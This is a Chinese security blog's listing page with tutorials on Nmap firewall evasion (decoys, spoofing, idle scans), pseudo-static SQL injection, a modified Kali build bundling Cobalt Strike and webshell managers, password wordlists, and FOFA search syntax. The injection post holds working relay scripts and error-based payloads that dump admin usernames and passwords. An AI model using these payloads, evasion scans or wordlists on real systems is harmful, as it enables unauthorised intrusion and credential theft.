首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,853 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,158 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,322 阅读
4
几个常见的密码字典推荐
3,392 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,214 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
188
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
26
篇与
的结果
2025-05-18
内网隐蔽扫描,Nmap高级用法
前言Nmap(Network Mapper)是一款开源免费的网络发现和安全审计工具,主要用于扫描目标主机的开放端口、操作系统类型、启用的服务等信息。以下是Nmap的一些常见使用介绍Nmap的常见使用介绍主机发现:Nmap可以通过发送不同类型的探测包(如ICMP echo请求、TCP SYN包等)来检测目标主机是否在线。常用命令如-sn(Ping扫描,只进行主机发现,不进行端口扫描)和-PE/PP/PM(使用ICMP echo、timestamp、netmask请求包发现主机)。端口扫描:Nmap支持多种端口扫描技术,包括TCP SYN扫描(-sS)、TCP connect扫描(-sT)、UDP扫描(-sU)等。用户可以根据需要选择适当的扫描方式,以探测目标主机上开放的端口。版本探测:Nmap能够探测目标主机上运行的服务及其版本信息。通过发送特定的探测包并分析响应,Nmap可以识别出服务的类型和版本。使用-sV选项可以启用版本探测功能。操作系统探测:Nmap还能够尝试识别目标主机的操作系统类型。通过收集目标主机的响应数据包中的指纹信息,并与已知的操作系统指纹库进行比对,Nmap可以推断出目标主机的操作系统。使用-O选项可以启用操作系统探测功能。NSE脚本引擎:Nmap的强大之处在于其内置的NSE(Nmap Scripting Engine)脚本引擎。用户可以通过编写或运行NSE脚本来扩展Nmap的功能,实现更复杂的网络探测和安全审计任务。结果输出:Nmap支持将扫描结果输出到不同的格式,包括文本、XML、Grepable等。用户可以根据需要使用相应的输出选项(如-oN、-oX等)来保存扫描结果。使用教程一、基本教程(附图文)1、指定端口扫描主机的开放端口,在nmap后面直接跟主机IP(默认扫描1000个端口)扫描指定端口,使用 -p 参数,可以一次扫描单个端口、多个端口、或扫描一个范围的端口nmap 192.168.31.180 -p 80 nmap 192.168.31.180 -p 1-80 nmap 192.168.31.180 -p 80,3389,22,21 nmap 192.168.31.180 -p 1-65535 nmap 192.168.31.180 -p- # -p- 等价于 -p 1-655352、主机探测扫描网段中有哪些主机在线,使用 -sP 参数,不扫描端口,只扫描「存活主机」。本质上是Ping扫描,能Ping通有回包,就判定主机在线。nmap -sP 192.168.209.0/243、服务识别扫描端口时,默认显示端口对应的服务,但不显示服务版本。想要识别具体的「服务版本」,可以使用 -sV 参数。nmap 192.168.209.1 -p 80-1000 -sV4、系统识别想要识别「操作系统版本」,可以使用 -O 参数。nmap 192.168.209.1 -OTips:Nmap扫描出的系统版本并不是完全正确的,仅供参考。当识别不出具体版本时,Nmap会以概率的形式列举出可能的操作系统,如上图所示。5、导出扫描结果Nmap的扫描结果可以保存到文件中,比如文本格式、XML格式。1)将扫描结果导出为「文本格式」,结果原样保存。nmap 192.168.209.1 -p 80-1000 -oN result.txt2)将扫描结果导出为「xml格式」,结果的保存格式会发生变化。nmap 192.168.209.1 -p 80-1000 -oX result.xml二、高级用法扫描绕过安全设备欺骗发送参杂着假ip的数据包检测nmap -D 111.111.111.111 192.168.209.11、碎片扫描通过将数据包分割成更小的部分发送,使得防火墙更难识别这些数据包属于一个扫描流量。nmap -f <目标IP地址> # 使用随机偏移量的碎片扫描 nmap -mtu 8 <目标IP地址> # 指定MTU大小为8的碎片扫描2、诱饵扫描在扫描数据包中添加多个诱饵IP地址,使目标防火墙难以判断真正的扫描源,从而增加扫描的隐蔽性。nmap -D RND:10 <目标IP地址> # 随机使用10个诱饵IP地址 nmap -D decoy1,decoy2,decoy3 <目标IP地址> # 指定具体的诱饵IP地址3、空闲扫描利用一台空闲主机(zombie host)作为跳板,通过向空闲主机发送经过特殊构造的数据包,间接地探测目标主机的端口状态,而无需直接向目标主机发送数据包。nmap -P0 -sI zombie <目标IP地址> # 使用名为zombie的空闲主机进行扫描注意:这里的“zombie”应替换为实际的空闲主机地址(简称僵尸机)。4、随机数据长度在发送的数据包中填充随机长度的数据,以绕过一些基于数据包长度过滤的防火墙规则。nmap --data-length 25 <目标IP地址> # 在每个数据包中填充25字节的随机数据5、欺骗扫描通过伪造源IP地址或MAC地址,使防火墙难以追踪真实的扫描源。nmap --sT -PN --spoof-mac aa:bb:cc:dd:ee:ff <目标IP地址> # 伪造源MAC地址进行TCP连接扫描 nmap --badsum <目标IP地址> # 发送带有错误校验和的数据包,可能绕过某些简单的防火墙规则 nmap -cloak-source <spoofed_ip1>,<spoofed_ip2> <target_ip> # 伪造ip地址进行扫描6、SYN扫描虽然SYN扫描本身并不直接绕过防火墙,但它是一种非常隐蔽的扫描方式,因为它只发送SYN包而不完成整个TCP握手过程,从而减少了被防火墙检测到的可能性。nmap -sS <目标IP地址> # 使用SYN扫描方式7、使用特定端口或绕过常用端口一些防火墙规则基于端口过滤,可以尝试使用特定的源端口来绕过。例如,很多防火墙允许HTTP端口(80)和HTTPS端口(443)通过。nmap --source-port 80 <目标IP地址> # 使用HTTP端口作为源端口进行扫描8、ARP Ping扫描(-PR)nmap -sn -PR <target_network> # 或者 nmap -PR <target_network>Tips:ARP 扫描仅适用于局域网环境,因为它依赖于 ARP 协议,该协议用于在局域网内解析 IP 地址到 MAC 地址。ARP 扫描可能无法发现配置了 ARP 过滤或 ARP 欺骗防护措施的主机。总结Nmap作为一款开源免费的网络发现和安全审计工具,功能强大且多样。它不仅能够进行主机发现和端口扫描,识别目标主机上的服务及其版本信息,还能尝试探测操作系统的类型。通过内置的NSE脚本引擎,Nmap的功能得到了进一步扩展,可以实现更复杂的网络探测任务。此外,Nmap支持将扫描结果输出到不同格式的文件中,便于用户保存和分析。高级用法中,Nmap提供了多种扫描策略,如碎片扫描、诱饵扫描和空闲扫描等,以帮助用户绕过安全设备的检测,增加扫描的隐蔽性和灵活性。自学网络安全,互相交流的同时还能交朋友,和博主一起来交流学习吧往期推荐别他妈扫端口了!老子在404页面养了个XSS丧尸军团护网三天裤衩漏?当代网安打工人掀桌暴走史当面试官逼问「如何绕过WAF」时,老子反手在会议室种了个0day还在SQL注入里当脚本小子?破解特斯拉的男人配叫黑客!【面试现场】菜鸟一句话干翻十年老渗透!神器分享 红队快速打点工具-DarKnuclei雷池+frp内网穿透,搭建企业级内网防护,无需花高额费用买服务器,教科书级别教学红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
2025年05月18日
1,934 阅读
0 评论
0 点赞
2025-05-18
伪静态注入总结
伪静态注入的总结伪静态页面渗透在日常的测试中,经常会遇到静态页面,尤其是政府类的站点(前提经过授权),此时就会非常的棘手,在下多试验后,发现以下思路或可以帮助我们跨越这个障碍。伪静态即是网站本身是动态网页如.php、.asp、.aspx等格式动态网页有时这类动态网页还跟“?”加参数来读取数据库内不同资料。很典型的案例即是discuz论坛系统,后台就有一个设置伪静态功能,开启伪静态后,动态网页即被转换重写成静态网页类型页面,通过浏览器访问地址和真的静态页面没区别。前提服务器支持伪静态重写URL Rewrite功能判断方法在浏览器里控制台(console),输入代码或粘贴js代码alert(document.lastModified); 回车执行,会弹出一个弹窗。重新刷新网页,再用相同的方法在控制台里输入查询代码,再查看文件的最后修改时间,如果发现时间不同则可以判断它是伪静态。如果是伪静态页面,可以尝试将其变成动态页面。伪静态的话只是由动态转成了静态,从地址上你是可以看到转递参数的,比如phpweb,它的链接是这样的:news/?123.html,这个你可以理解成news.php?id=123。所以你可以news/?123*.html这样提交。或者可以进行伪静态中转。(伪静态中转注入总结:博客园地址)入侵的大概思维方式对搜索框进行测试(注入测试) 对登录处进行测试(万能密码、注入) 对站点进行目录扫描(发现其他突破口) 从C段下手一:中转注入法1.通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了http://www.xxx.com/news.php/id/1.html2.测试步骤:中转注入的php代码:inject.php<?php set_time_limit(0); $id=$_GET["id"]; $id=str_replace(” “,”%20″,$id); $id=str_replace(“=”,”%3D”,$id); //$url = "http://www.xxx.com/news.php/id/$id.html"; $url = "http://www.xxx.com/news.php/id/$id.html"; //echo $url; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); $output = curl_exec($ch); curl_close($ch); print_r($output); ?> 3.本地环境搭建PHP,然后访问http://127.0.0.1/inject.php?id=1通过sqlmap或者havj可以跑注入漏洞。附录ASP中转代码:<strong><font style="font-size: 12pt"><code id="code1"><% JmdcwName=request("id") JmStr=JmdcwName JmStr=URLEncoding(JmStr) JMUrl="http://192.168.235.7:8808/ad/blog/" //实际上要请求的网址 JMUrl=JMUrl & JmStr&".html" //拼接url response.write JMUrl&JmStr //我这里故意输出url来看 'JmRef="http://127.0.0.1/6kbbs/bank.asp" JmCok="" JmCok=replace(JmCok,chr(32),"%20") JmStr=URLEncoding(JmStr) response.write PostData(JMUrl,JmStr,JmCok,JmRef) //url,查询字符串,cookie,referer字段 Function PostData(PostUrl,PostStr,PostCok,PostRef) Dim Http Set Http = Server.CreateObject("msxml2.serverXMLHTTP") With Http .Open "GET",PostUrl,False .Send () PostData = .ResponseBody End With Set Http = Nothing PostData =bytes2BSTR(PostData) End Function Function bytes2BSTR(vIn) //处理返回的信息 Dim strReturn Dim I, ThisCharCode, NextCharCode strReturn = "" For I = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn, I, 1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn, I + 1, 1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) I = I + 1 End If Next bytes2BSTR = strReturn End Function Function URLEncoding(vstrin) //发包前对参数的url编码一下 strReturn="" Dim i 'vstrin=replace(vstrin,"%","%25") '增加转换搜索字符, 'vstrin=Replace(vstrin,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20 'vstrin=Replace(vstrin,chr(43),"%2B") 'JMDCW增加转换+字符 vstrin=Replace(vstrin,chr(32),"/**/") '在此增加要过滤的代码 //这里很关键,方便啊,把空格自动换成/**/,后面会说到的 For i=1 To Len(vstrin) ThisChr=Mid(vstrin,i,1) if Abs(Asc(ThisChr))< &HFF Then strReturn=strReturn & ThisChr Else InnerCode=Asc(ThisChr) If InnerCode<0 Then InnerCode=InnerCode + &H10000 End If Hight1=(InnerCode And &HFF00) &HFF Low1=InnerCode And &HFF strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1) End if Next URLEncoding=strReturn End Function %></code></font></strong>二、手工注入法1.http://www.xxx.com/play/Diablo.htmlhttp://www.xxx.com/down/html/?772.html2.测试注入:http://www.xxx.com/down/html/?772′.htmlhttp://www.xxx.com /play/Diablo'.htmlhttp://www.xxx.com/play/Diablo'/**/and /*/1='1 /.htmlhttp://www.xxx.com/play/Diablo' //and //1='2 /*.htmlhttp://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html 正常http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html 出错3.看页面是否存在差异,相同则不存在,不同存在注入。4.联合查询:http://www.xxx.com/play/diablo’ and 1=2 union select 1,2… frominformation_schema.columns where 1='1.htmlhttp://www.xxx.com/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html三、手工注入法(二)http://www.xxx.net/news/html/?410.htmlhttp://www.xxx.net/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html注:伪静态的注入和URL的普通GET注入不太相同 。普通url的get注入的%20,%23,+等都可以用;但是伪静态不行,会被直接传递到到url中,所以用/**/这个注释符号表示空格。三、SQLmap方法在sqlmap中伪静态哪儿存在注入点就加*http://www.cunlide.com/id1/1/id2/2 python sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″http://www.xxx.com/news/class/?103.htmpython sqlmap.py -u “http://www.xxx.com/news/class/?103*.html”四、python脚本方法代码一:<code id="code3">from BaseHTTPServer import * import urllib2 class MyHTTPHandler(BaseHTTPRequestHandler): def do_GET(self): path=self.path path=path[path.find('id=')+3:] proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"}) opener = urllib2.build_opener(proxy_support) urllib2.install_opener(opener) url="http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/" try: response=urllib2.urlopen(url+path) html=response.read() except urllib2.URLError,e: html=e.read() self.wfile.write(html) server = HTTPServer(("", 8000), MyHTTPHandler) server.serve_forever()</code>转载:https://www.cnblogs.com/jsq16/p/5942003.htmlhttps://blog.csdn.net/qq_41545233/article/details/106713530
2025年05月18日
405 阅读
0 评论
0 点赞
2025-05-18
2024 最新 Kali Linux 定制化魔改,完整版添加常见60渗透工具
系统版本:kali linux 2024.1固件类型:BIOS用户: zss 密码: ss系统压缩大小:18.8 GB,解出来:36.00GB 左右,请提前预留好足够的空间下载链接https://pan.quark.cn/s/e5ca0a5847a4这个版本添加工具武器库比如我们pip命令后面忘了是什么了,我们就可以输入pip然后在按ctrl+r在这个版本里面添加了自用的写的工具箱,一共集成了常见测试工具近60个,在kali 系统上没有的神兵利器BurpSuite pro中文版Cobalt Strike 4.5Cobalt Strike 4.7Cobalt Strike 4.8Cobalt Strike 4.9Yakit端口扫描工具naabu:是用快速端口扫描工具指纹识别工具CMSeek (kali也集成了CMSeek是阉割版的)EHole:EHole(棱洞) 重构版-红队重点攻击系统指纹探测工具CmsVulScan:cms识别工具,用于识别网站使用的cms,收集了github上多个扫描工具的指纹目录扫描工具dirsearch(kali也集成了Dirsearch没有官方版本好用):是一个基于python的命令行工具,用于暴力扫描页面结构,包括网页中的目录和文件,就是目录资源发现工具Fofa_Viewer:是一个用 JavaFX 编写的用户友好的 FOFA 客户端Fofax:是一款使用Go编写的命令行FoFa查询工具信息泄露工具Cloud_Bucket_Leak_Detection_Tools(云存储泄露工具):六大云存储,泄露利用检测工具SvnExploit:支持SVN源代码泄露全版本Dump源码Dumpall:是一款信息泄漏利用工具,适用于.git/.svn/.DS_Store泄漏和目录列出子域名探测工具dnsx:是一款功能强大的多用途DNS工具包,该工具运行速度非常快OneForAll:是一款功能强大的子域收集工具subfinder:是一个子域发现工具,可以为任何目标枚举海量的有效子域名其他信息收集工具zpscan:一款好用的命令行信息收集工具漏洞扫描工具nuclei:Nuclei使用零误报的定制模板向目标发送请求,同时可以对主机进行批量快速扫描POC-bomber:是一款漏洞检测工具Goby:是一款基于网络空间测绘技术的新一代网络安全工具afrog:是一款快速稳定的高性能漏洞扫描程序fscan:是一个内网综合扫描工具,方便一键自动化、全方位漏洞扫描Packer-Fuzzer:一款针对Webpack等前端打包工具所构造的网站进行快速、高效安全检测的扫描工具woodpecker-framework:是一款漏洞精准检测深度利用框架,只做一件事:精准狙击高危漏洞数据库漏洞利用工具Sqlmap中文版:汉化版Sqlmap,对于英语不好的朋友们很友好MDUT:MDUT工具全称 Multiple Database Utilization Tools, 是一款中文的数据库跨平台利用工具,集合了多种主流的数据库类型ARDM:ARDM全称Another Redis Desktop Manager是一个更快、更好、更稳定的Redis桌面(GUI)管理客户端XSS漏洞工具XSS-Trike:是一款检测Cross Site Scripting的高级检测工具DalFox:DalFox是一个强大的开源工具,专注于自动化,非常适合快速扫描XSS缺陷和分析参数综合工具Yasso:是强大的内网渗透辅助工具集LiqunKit:工具是一个综合漏洞扫描工具Full-Scanner:是一个多功能扫描工具,支持被动/主动信息收集漏洞扫描工具联动,可导入POC和EXP中间件/应用漏洞工具FastjsonScan:Fastjson扫描器,可识别版本、依赖库、autoType状态等。WeblogicTool:WeblogicGUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动)Struts2漏洞检查工具:Struts2工具是希潭实验室ABC123开发全版,Struts2本漏洞检测工具ShiroAttack2:ShiroAttack2工具是一款针对Shiro560漏洞进行快速漏洞利用ShiroExp:shiro一把梭工具MYExploit:一款基于产品的一键扫描工具OA-EXPTOOL:OA-EXPTOOL是OA综合利用工具,集合将近20款OA漏洞批量扫描通达OA漏洞利用工具(TongdaOATools)Apt-t00ls:高危漏洞利用工具 泛微|蓝凌|用友|万户|通达|中间件等综合利用工具:ThinkPHP漏洞综合利用工具图形化界面,命令执行,一键getshell,批量检测,日志遍历,session包含,宝塔绕过利用工具By莲花:漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshellJboss漏洞工具:小黑开发的一款Jboss综合利用工具SBSCAN:是一款专注于spring框架的渗透测试工具暴力破解工具社工密码生成器pydictor:Pydictor是一个强大实用的黑客暴力破解字典建立工具webshell管理类工具天蝎权限管理工具(skyscorpion)中国蚁剑冰蝎3.0冰蝎哥斯拉 4.0.1webshell生成工具(webshell_generate)应急响应工具。。。。。。。。更多描述查看原文链接:https://blog.csdn.net/qq_41860876/article/details/141320430
2025年05月18日
1,319 阅读
0 评论
0 点赞
2025-05-18
几个常见的密码字典推荐
Weakpass这是一个专门提供弱口令字典的网站,包括单词、数字、常用密码、常见手机号码等。官网地址:https://weakpass.com/SecList这是一个安全研究者和渗透测试人员常用的资源库,其中收集了一个 "Passwords" 目录,包含着许多大型的字典文件,包括弱口令字典。官网地址:https://github.com/danielmiessler/SecLists/tree/master/PasswordsProbable-Wordlists这是一个目前最大的密码字典之一,包含了 2376 个字典文件,包括密码、用户名、社会工程学素材等。现github高达8.6kstar官网地址:https://github.com/berzerk0/Probable-WordlistsCrackStation这是一个专门提供密码破解工具的服务网站,其中也提供了许多常见的弱口令字典,包括万能密码、社会工程学密码、差密码等。官网地址:https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionaries.htmKali/usr/share/wordlists/这是Kali Linux中默认的字典文件存放目录,包含了各种类型的字典文件,这些文件广泛用于密码爆破、漏洞扫描等场景。在这个目录下,你可以找到许多以.txt格式存储的字典文件,每个文件中包含一连串的单词或短语,用于密码破解时的猜测依据。/usr/share/dirb/wordlistsDirBuster 目录扫描工具的字典文件目录,用于穷举目录和文件路径。/usr/share/sqlmap/data/txtSQLMap 工具的字典文件目录,用于自动化 SQL 注入检测。/usr/share/metasploit-framework/data/wordlists/Metasploit框架中的字典文件,适用于不同类型的渗透测试活动。/usr/share/Nmap/nselib/data/Nmap 工具的字典文件目录,包含用于脚本和扫描的字典。/usr/share/wfuzz/wordlist/wfuzz 工具的字典文件目录,用于 Web 应用程序渗透测试。/usr/share/crunch/Crunch 工具的字典文件目录,用于生成自定义密码字典。自定义如果你懒得下载,那么就直接使用下面这段字典吧常见的用户名username test test1 test2 test3 testing tester admin admin1 admin2 admin3 login administrator system 123456 123456789 12345678 member guest user user1 user2 user3 root ghost yangxiu zhangwei wangwei wangfang liwei lina test admin system zhangmin lijing wangjing liuwei zhangli wangli zhangjing liqiang wangmin limin wanglei liuyang wangyan wangyong lijun zhangyong lijie zhangjie zhanglei wangqiang lijuan wangjun zhangyan zhangtao wangtao liyan wangchao liming liyong wangjuan liujie chengming chenming liumin lixia lili zhangjun wangjie zhangqiang wanggang wangping liufang liuyan liujun liping wanghui chenjing liuyong liling wangdan ligang lidan wangpeng liutao chenwei zhanghua liujing litao wangyuting lihong lichao liuli zhangpeng zhangchao wangling zhangling lihua wangfei wangying liuqiang liying lihui limei chenyong wang lifang libo yangyong wangxia wangbin lipeng zhangping zhanghui zhangyu liujuan libin wanghao chenjie wangkai chenli chenmin zhangbo zhangying yangli zhangjian wangbo zhanghong liudan li yangjing liuchao zhangjuan yangfan liuying lixue zhang wangjian liuhui liubo zhanghao zhangming chenyan zhangxia yangjie wangshuai wangxue yangjun zhangxu liugang wanghua yangmin wangning lining liubin chentao wangna zhangbin chenlong lilin wanghong yangyang wanglin chenying chenjun liuxia chenhao zhangkai chenfang yangtao yangbo chenhong liuhuan chenjuan chengang zhanglin zhangna liujia liulei liupeng wangxu zhangxue liyang wangmei liyumei liuping yangmei lifei wangliang lilei wangyu chenling zhangshuai lijian chenlin chenqiang zhaojing wangcheng chenchao chenliang liuna wangqin liuchang yangyan zhangliang liyun zhangqin liyuzhen yangchao zhangmei chenping liuhong zhaowei zhangyun zhangning yanglin gaofeng chenhua yanghua yangliu yangfang liuling chenchen wanghuan zhanglong chenbo chenlei wangyun wangfeng wangrui liqin chenpeng liufei lihao zhangdan lifeng lijia chenhui zhangfang chenxia liukai liuhua libing wangdong yangwei wanglong liuming zhoumin huangwei yanglei zhaomin chenyun likai zhangfeng lilong lishuai lixin liuyun chenbin liyuhua chenfei liuhan huangyong zhouwei wangkun lixiang zhangrui liushuai zhangfei wangyang liqiuchen mali yangling yangping liliang lirong wangbing wangming chenmei liufeng lixiuhua lidandan yangxue wangxin zhaoli huangmin yangjuan zhoujie liumei zhaojun zhaoyong liubing yangbin liwen sunwei liuyu zhangrong zhangfan zhouyong zhangkun xuwei liuqin zhoujing xumin xujing yanghong zhangwen zhouli machao wangxiuying lixiuying zhangxiuying wangxiulan liguiying wangguiying zhangxiulan zhangguiying wangyulan lixiulan zhangyulan wangguilan chenxiuying zhangguilan liguilan wangxiuzhen liyulan liuxiuying liuguiying yangxiuying lijun4 lixiuzhen zhangxin liuyulan liuguilan wangting wangyumei wangyuzhen zhangfengying lifengying liting zhangting wangyuying zhangyumei wangfengying zhangyuying lihongmei zhangqian zhangxiuzhen wangjianhua lijianhua zhangjianhua liuxin wangqian zhangyuzhen zhanglanying liqian wanglanying chenguiying wangjianguo wangjianjun wangshuzhen lichunmei wanghaiyan lidongmei wangxiurong liguizhen wangxiuyun wangguirong wangzhiqiang zhanghongmei liufengying liyuying wangxiumei wanglijuan zhangtingting wangtingting wangyuhua zhangjianguo lilanying wangguizhen lixiumei chenyulan zhangyuhua liuyumei lijianjun liuyuzhen lijianguo liguirong liuting chenxiulan zhangjianjun lixiurong zhangxiumei lixuemei zhanghaiyan wangshulan lizhiqiang litingting zhangxiurong liujianhua wanglili lihaiyan zhangguirong liuxiulan zhangzhiqiang lixiuyun lixiufang zhanglili zhangxiuyun wangshuying wangchunmei wanghongmei liguifang liuhao huangxiuying liuyuying lishuzhen wangxiufang wanglihua wangdandan wangguixiang zhangguizhen wangshuhua zhangxiufang zhangguifang zhanglijuan wuxiuying yangming liguixiang liuqian yangxiulan wangxiuhua liguizhi wangguifang zhangchunmei wangdongmei liuyuhua maxiuying zhanglihua zhangshuzhen lixiaohong wangguizhi zhangxiuhua wangjinfeng chenjianhua yangguiying lishuying chenyuying yangxiuzhen sunxiuying zhangnan liuguizhen liujianjun zhangshuying lihongxia zhaoxiuying wangjianping zhangguizhi wangguihua liutingting wanglu zhangshulan chenguilan lishuhua chenxin liujianguo liguihua wangfenglan lishulan chenxiuzhen常见的密码123456a123456 123456a 521314 111111 woaini1314 qq123456 123123 000000 1qaz2wsx 1q2w3e4r qwe123 7758521 123qwe a123123 123456aa woaini5 woaini 10020 13145 woaini123 123321 q123456 123456789 123456789a 5211314 asd123 a123456789 z123456 asd123456 a521314 aa123456 zhang123 aptx4869 123123a 1q2w3e4r5t 1qazxsw2 5 1314a 1q2w3e aini1314 31415926 q1w2e3r4 123456qq woaini521 1234qwer a111111 5252222 iloveyou abc123 110110 111111a 123456abc w123456 7758258 123qweasd 159753 qwer1234 a000000 qq123123 zxc123 123654 abc123456 123456q qq521314 12345678 000000a 456852 as123456 1314521 112233 521521 qazwsx123 zxc123456 abcd1234 asdasd 666666 love1314 QAZ123 aaa123 q1w2e3 aaaaaa a123321 123000 11111111 12qwaszx 584521314 s123456 nihao123 caonima123 zxcvbnm123 wang123 159357 1A2B3C4D asdasd123 5845 753951 147258 1123581321 1101 qq13145
2025年05月18日
3,392 阅读
0 评论
0 点赞
2025-05-18
信息收集:网络空间测绘FOFA,查询语法最全使用方法(图文解析)
前言经粉丝投稿,特意搜集了一些fofa的使用教程和一些高级用法什么是FOFA?官网描述:FOFA-网络空间资产搜索引擎是华顺信安推出的一款通过对全球网络对外开放服务的资产进行主动或被动方式探测、抓取、存储,分析整理不同种类的网络空间资产指纹信息(规则),并对符合规则的资产进行统计分析,进而快速检索全球网络空间资产的产品。它能够帮助用户迅速进行网络资产匹配,快速开展网络空间威胁态势感知、漏洞影响范围分析、应用分布统计、应用流行度排名统计等工作。查询语法表高级搜索逻辑连接符具体含义=匹配,=""时,可查询不存在字段或者值为空的情况。==完全匹配,==""时,可查询存在且值为空的情况。&&与||或!=不匹配,!=""时,可查询值不为空的情况。*=模糊匹配,使用或者?进行搜索,比如banner="mys??" (个人版及以上可用)。()确认查询优先级,括号内容优先级最高。基础类别标记类(Special Label)协议类 (type=service)网站类(type=subdomain)证书类地理位置(Location)时间类(Last update time)独立IP语法(独立IP系列语法,不可和上面其他语法共用)查询基础语法案例直接输入查询语句,将从标题,html内容,http头信息,url字段中搜索;html搜索我们找到某云的登录提示,因为文字在网页中皆属于html复制在fofa查询即可,发现还有其他的网站使用了关联的内容那么我们可以对国家进行筛选此时即可缩小查找的范围既然是html,那么我们这样搜索呢title标题搜索domain域名搜索如果查询表达式有多个与或关系,尽量在外面用()包含起来,比如这样。host主机名搜索host="主机名"os操作系统搜索os="操作系统"server服务器查询server="nginx"通过服务器进行查询org所属组织body搜索内容通过HTML正文进行查询js_name通过HTML正文中js进行查询headerheader="thinkphp"portport="3306",找mysql的端口地址icpicp="备案号"status_codestatus_code="服务器状态码"protocolprotocol="协议类型" ,例如https/ssh/httpcountrycountry="国家编码"regionregion=“行政区” ,英文名称即可citycity=“城市”appapp="设备"基础常用语法就到这儿了,都看完了,那么再加个群和大佬们一起交流吧 =-=
2025年05月18日
1,471 阅读
0 评论
0 点赞
1
...
4
5
6